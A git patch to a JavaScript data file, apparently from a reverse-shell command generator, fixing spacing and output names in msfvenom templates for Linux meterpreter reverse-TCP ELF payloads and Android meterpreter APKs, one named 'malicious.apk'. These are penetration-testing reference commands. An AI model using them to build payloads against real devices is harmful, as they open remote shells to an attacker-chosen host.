From 77ed7ff95fbe554ff96033734188e91d9c644334 Mon Sep 17 00:00:00 2001 From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com> Date: Sun, 21 Mar 2021 12:12:08 -0400 Subject: [PATCH] Update data.js MSFVenom Spaces --- js/data.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/js/data.js b/js/data.js index 90ff807..e6f6302 100644 --- a/js/data.js +++ b/js/data.js @@ -262,12 +262,12 @@ const msfvenomCommands = withCommandType( }, { "name": "Linux Meterpreter Staged Reverse TCP", - "command": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf >reverse.elf", + "command": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf > reverse.elf", "meta": ["msfvenom", "linux", "meterpreter", "staged", "reverse"] }, { "name": "Linux Stageless Reverse TCP", - "command": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf >reverse.elf", + "command": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf > reverse.elf", "meta": ["msfvenom", "linux", "meterpreter", "stageless", "reverse"] }, { @@ -297,13 +297,13 @@ const msfvenomCommands = withCommandType( }, { "name": "Android Meterpreter Reverse TCP", - "command": "msfvenom –p android/meterpreter/reverse_tcp lhost={ip} lport={port} R > payload-name.apk", + "command": "msfvenom –p android/meterpreter/reverse_tcp lhost={ip} lport={port} R > malicious.apk", "meta": ["msfvenom", "android", "android", "reverse"] }, { "name": "Android Meterpreter Embed Reverse TCP", - "command": "msfvenom -x android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk", + "command": "msfvenom -x android/meterpreter/reverse_tcp lhost={ip} lport={port} > payload.apk", "meta": ["msfvenom", "android", "android", "reverse"] }, {